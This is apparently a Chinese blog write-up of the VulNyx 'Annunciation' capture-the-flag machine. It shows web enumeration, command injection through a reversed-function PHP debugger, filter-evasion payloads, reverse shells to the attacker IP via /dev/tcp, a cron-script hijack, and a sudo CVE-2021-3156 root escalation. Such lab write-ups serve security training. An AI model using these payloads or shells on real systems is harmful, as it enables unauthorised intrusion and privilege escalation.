Annunciation

靶机ip:192.168.108.136

攻击机ip:192.168.108.50

Kal ddddx ~ ❯ export ip=192.168.108.136
Kal ddddx ~ ❯ nmap $ip -A -O -p-                                                                      ✘ INT at 07:59:58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 08:00 CST
Nmap scan report for 192.168.108.136
Host is up (0.0010s latency).
Not shown: 65387 filtered tcp ports (no-response), 146 filtered tcp ports (host-prohibited)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 3b:a9:30:f4:e2:10:b4:3b:2e:a4:db:32:9a:b9:8b:80 (RSA)
|   256 76:f3:48:b4:53:4a:be:95:44:00:16:81:1e:f2:2e:68 (ECDSA)
|_  256 37:07:9a:8d:e0:3b:bc:39:8f:2f:6e:36:81:89:db:2d (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Apache HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
| http-methods:
|_  Potentially risky methods: TRACE
MAC Address: 08:00:27:1C:F8:AF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.14 (97%), Linux 5.1 - 5.15 (97%), Linux 3.13 - 3.16 (91%), Linux 3.13 - 4.4 (91%), Linux 3.16 - 4.6 (91%), Linux 3.8 - 3.16 (91%), Linux 4.10 (91%), Linux 4.4 (91%), OpenWrt 19.07 (Linux 4.14) (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.04 ms 192.168.108.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.17 seconds

开放了22和80两个端口，namp显示http支持TRACE方法，可能存在 [Cross Site Tracing (XST)] 漏洞，可以借助 JavaScript 绕过同源策略配合 XSS 读取内容

用浏览器访问80端口是个默认页面，应该是没有东西的

图片.png

尝试目录扫描，正常目录没扫出东西，隐藏目录发现了一个.dev

Kal ddddx ~ ❯ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u 'http://192.168.108.136/FUZZ' -fc 403

...

Kal ddddx ~ ❯ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u 'http://192.168.108.136/.FUZZ' -fc 403

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.108.136/.FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________

dev                     [Status: 301, Size: 236, Words: 14, Lines: 8, Duration: 0ms]

访问.dev和.dev的源码

图片.png

没有头绪，继续尝试目录遍历查看是否 .dev/ 是一个目录，第一遍返回很多垃圾，过滤完响应大小后，扫半天终于出了个页面


Kal ddddx ~ ❯ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u 'http://192.168.108.136/.dev/FUZZ' -e .txt,.php,.html -fc 403 --fs 19485
    /'___\\\\  /'___\\\\           /'___\\\\
   /\\\\ \\\\__/ /\\\\ \\\\__/  __  __  /\\\\ \\\\__/
   \\\\ \\\\ ,__\\\\\\\\ \\\\ ,__\\\\/\\\\ \\\\/\\\\ \\\\ \\\\ \\\\ ,__\\\\
    \\\\ \\\\ \\\\_/ \\\\ \\\\ \\\\_/\\\\ \\\\ \\\\_\\\\ \\\\ \\\\ \\\\ \\\\_/
     \\\\ \\\\_\\\\   \\\\ \\\\_\\\\  \\\\ \\\\____/  \\\\ \\\\_\\\\
      \\\\/_/    \\\\/_/   \\\\/___/    \\\\/_/

   v2.1.0-dev

:: Method           : GET
:: URL              : http://192.168.108.136/.dev/FUZZ
:: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
:: Extensions       : .txt .php .html
:: Follow redirects : false
:: Calibration      : false
:: Timeout          : 10
:: Threads          : 40
:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
:: Filter           : Response status: 403
:: Filter           : Response size: 19485

debugger.php            [Status: 200, Size: 33, Words: 5, Lines: 2, Duration: 257ms]
:: Progress: [147168/4741016] :: Job [1/1] :: 917 req/sec :: Duration: [0:02:38] :: Errors: 0 ::

尝试访问一下debugger.php ，说是只支持post方法

图片.png

使用post方法，提示我们没有提供适当的参数，使用wfuzz工具进行枚举，发现没用，看PL4GU3大佬的的解题视频，发现原来是要有两个参数，这里爆破太慢了

1
2
3

Kal ddddx ~ ❯ curl -X POST http://192.168.108.136/.dev/debugger.php -d "test=data"                          at 08:57:48
You have not indicated the appropriate parameters...
Please try again!

wfuzz -u http://192.168.108.136/.dev/debugger.php -X POST -d "FUZZ=whoami" -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -H "Content-Type: application/x-www-form-urlencoded" --hh 0 --hc 200

Kal ddddx ~ ❯ ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:W1 -w /usr/share/seclists/Discovery/Web-Content/common.txt:W2 -u http://192.168.108.136/.dev/debugger.php -X POST -d "W1=whoami&W2=test" -H "Content-Type: application/x-www-form-urlencoded" -mc 500 -t 3000

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://192.168.108.136/.dev/debugger.php
 :: Wordlist         : W1: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Wordlist         : W2: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : W1=whoami&W2=test
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 3000
 :: Matcher          : Response status: 500
________________________________________________

[Status: 500, Size: 53, Words: 7, Lines: 3, Duration: 144ms]
    * W1: cmd
    * W2: access

尝试上传指令

Kal ddddx ~ ❯ curl -X POST http://192.168.108.136/.dev/debugger.php -d "cmd=whoami&access=id"               at 14:24:17
Parameter 1 (access): di
Parameter 2 (cmd): whoami
Kal ddddx ~ ❯ curl -X POST http://192.168.108.136/.dev/debugger.php -d "cmd=id&access=whoami"  at 14:24:36
Parameter 1 (access): imaohw
Parameter 2 (cmd): id

access=whoami 被解析为 imaohw，**值被反转了，**同时 cmd=id 没有被执行，将输入的指令替换成php语言的反转一下再发送，状态码变为200说明执行成功，可以推断出服务器代码可能包含一段逻辑，大致像这样

<?php
if (isset($_POST['cmd']) && isset($_POST['access'])) {
    $reversed_access = strrev($_POST['access']); // 反转access参数
    $reversed_access($_POST['cmd']);            // 将反转后的access作为函数名,cmd作为参数执行
}

图片.png

所有我们尝试传入可以使用cmd执行的函数，例如：

exec()

执行命令，不直接输出，可以捕获结果

passthru()

执行命令并直接输出到页面（适合用来查看命令行输出）

shell_exec()

执行命令并返回完整输出为字符串

system()

执行命令并立即输出每行内容，也可以返回最后一行

backticks（反引号）

这是一种 PHP 语法糖，和 shell_exec() 类似

最后试出来是passthru

（注意这里不能有换行，也会识别进去导致失效）

先查看当前目录的东西，尝试获取debugger.php页面的源码，发现没回显，尝试查看passwd同样没有回显，怀疑有过滤

图片.png

尝试base64加密绕过没效果，使用使用 cat + $(...) 混淆
绕过目标**/etc/passwd**

怀疑/被过滤，常规为

1	cat $(echo .etc.passwd \| tr '.' '/')

echo .etc.passwd ➜ 输出 .etc.passwd

tr '.' '/' ➜ 替换成 /etc/passwd

cat $(...) ➜ 实际执行：cat /etc/passwd

这里使用tr映射的方法，选取两个范围一致的字符集将 . 和 / 对应起来

1	access=urhtssap&cmd=cat $(echo .etc.passwd \| tr ',-0' '--1')

图片.png

Parameter 1 (access): passthru
Parameter 2 (cmd): cat $(echo .etc.passwd | tr ',-0' '--1')
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
trumpeter:x:1001:1001::/home/trumpeter:/bin/bash

再次尝试获取debugger.php页面源码，成功获取

1	access=urhtssap&cmd=cat $(echo .var.www.html. \| tr ',-0' '--1').dev$(echo . \| tr ',-0' '--1')debugger.php

Parameter 1 (access): passthru
Parameter 2 (cmd): cat $(echo .var.www.html. | tr ',-0' '--1').dev$(echo . | tr ',-0' '--1')debugger.php
<?php

$var1 = strrev($_POST['access']);// 将 access 参数反转，作为函数名
$var2 = str_replace(array('nc', 'whoami', 'curl', 'ping', 'pwd', 'hostname', 'sh', 'nc', 'base', ':', '\\', '/', '*'), '', $_POST['cmd']); 
 // 过滤掉危险命令和字符
if ($_SERVER["REQUEST_METHOD"] == "POST") {
	if(isset($_POST['access']) && isset($_POST['cmd']))
	{
		echo "Parameter 1 (access): " . strrev($_POST['access']) . "\n";
		echo "Parameter 2 (cmd): " . $_POST['cmd'] . "\n";
		$var1($var2);// 相当于 passthru($var2) 如果 access=urhtssap
		extract($_POST);
	}
	else {
		echo "You have not indicated the appropriate parameters...\nPlease try again!\n";
	}
}
else {
	echo "Only POST requests are accepted!\n";
}

?>

过滤逻辑：会将提交的命令中出现的这些关键字全删掉：

命令：nc, whoami, curl, ping, pwd, hostname, sh, base
符号：:, \,/, *

有sh,传入混淆并url编码后的shell

1	access=urhtssap&cmd=s\h+-i+>%26+$(echo+.dev.tcp.+\|+tr+',-0'+'--1')192.168.108.50$(echo+.+\|+tr+',-0'+'--1')4444+0>%261

图片.png

搜寻一番后无果，上传软件脚本帮助测试

(remote) apache@annunciation:/tmp$ ls
linpeas.sh  pspy64  socat
(remote) apache@annunciation:/tmp$ chmod +x pspy64
(remote) apache@annunciation:/tmp$ chmod +x linpeas.sh
(remote) apache@annunciation:/tmp$ chmod +x socat
(remote) apache@annunciation:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
.......
2025/05/30 10:35:33 CMD: UID=0     PID=2      |
2025/05/30 10:35:33 CMD: UID=0     PID=1      | /usr/lib/systemd/systemd --switched-root --system --deserialize 22
2025/05/30 10:36:01 CMD: UID=0     PID=2056   | /usr/sbin/crond -n
2025/05/30 10:36:01 CMD: UID=1001  PID=2058   | /bin/bash /opt/RE/autobin.sh
2025/05/30 10:36:01 CMD: UID=1001  PID=2057   | /bin/bash /opt/RE/autobin.sh
2025/05/30 10:36:01 CMD: UID=0     PID=2060   | /usr/sbin/CROND -n
2025/05/30 10:36:01 CMD: UID=1001  PID=2059   | /usr/bin/python3 /usr/local/bin/binwalk -M -e /opt/RE/walk.zip
2025/05/30 10:36:01 CMD: UID=1001  PID=2061   | /bin/bash /opt/RE/autobin.sh
2025/05/30 10:36:01 CMD: UID=1001  PID=2062   | /bin/bash /opt/RE/autobin.sh
2025/05/30 10:36:03 CMD: UID=1001  PID=2063   | /usr/sbin/postdrop -r
2025/05/30 10:36:05 CMD: UID=0     PID=2064   |

uid表示为非root用户，发现重复执行相同脚本，通过binwalk递归（-M）提取 /opt/RE/walk.zip 中的嵌套文件，将autobin.sh复制出来，写入反弹命令到脚本，再监听一下，成功进入 trumpeter用户，拿到第一个flag

 remote) apache@annunciation:/tmp$ ls -al /opt/RE/autobin.sh
-r-xr-xr-x 1 trumpeter apache 142 Aug 28  2023 /opt/RE/autobin.sh
(remote) apache@annunciation:/tmp$ cp /opt/RE/autobin.sh /tm
(remote) apache@annunciation:/tmp$ vi autobin.sh
(remote) apache@annunciation:/tmp$ cat autobin.sh
#!/bin/bash

/usr/local/bin/binwalk -M -e /opt/RE/walk.zip
rm -rf /home/trumpeter/_walk.zip*
rm -rf /home/trumpeter/.config/binwalk/plugins/*
bash -i >& /dev/tcp/192.168.108.50/3333 0>&1
(remote) apache@annunciation:/tmp$ chmod 777 autobin.sh
(remote) apache@annunciation:/tmp$ ls -al autobin.sh
-rwxrwxrwx 1 apache apache 142 May 30 10:46 autobin.sh
(remote) apache@annunciation:/tmp$ vi autobin.sh
obin.sh  apache@annunciation:/tmp$ mv autobin.sh /opt/RE/auto
mv: try to overwrite '/opt/RE/autobin.sh', overriding mode 0555 (r-xr-xr-x)? y
(remote) apache@annunciation:/tmp$

(remote) trumpeter@annunciation:/home/trumpeter$ id
uid=1001(trumpeter) gid=1001(trumpeter) groups=1001(trumpeter)
(remote) trumpeter@annunciation:/home/trumpeter$ cat user.txt
VulNyx{4fd65522b14a83bd3c49f8cebdea42f6}

列出当前用户在该系统上可以使用 sudo 执行的命令

(remote) trumpeter@annunciation:/home/trumpeter$ sudo -l
Matching Defaults entries for trumpeter on annunciation:
    !visiblepw, always_set_home, match_group_by_gid,
    always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY
    HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2
    QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LD_LIBRARY_PATH LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
    LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
    _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User trumpeter may run the following commands on annunciation:
    (root) NOPASSWD: /usr/sbin/findfs

发现可以 sudo 执行 /usr/sbin/findfs，且无需密码（NOPASSWD）findfs 可能会触发底层工具如 blkid 或尝试挂载可以结合恶意文件系统镜像,但无法自动挂载手动又没权限，无果

查看sudo版本发现sudo版本过低，存在CVE-2021-3156

(remote) trumpeter@annunciation:/tmp$ sudo --version
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23

去github上拿个exphttps://github.com/worawit/CVE-2021-3156,得到提权用户

(remote) trumpeter@annunciation:/tmp$ vi run.py
You have new mail in /var/mail/trumpeter
(remote) trumpeter@annunciation:/tmp$ python run.py
.....
(remote) trumpeter@annunciation:/tmp$ cat /etc/passwd
...
gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash
(remote) trumpeter@annunciation:/tmp$ su gg
Password:
(remote) root@annunciation:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@annunciation:/home# cd /root/
(remote) root@annunciation:/root# ls
root.txt
(remote) root@annunciation:/root# cat root.txt
VulNyx{3c84b473492b03c0eaeaa749d4d53d52}

如果您喜欢此博客或发现它对您有用，则欢迎对此发表评论。也欢迎您共享此博客，以便更多人可以参与。如果博客中使用的图像侵犯了您的版权，请与作者联系以将其删除。谢谢！

Annunciation

Annunciation

特色标签

链友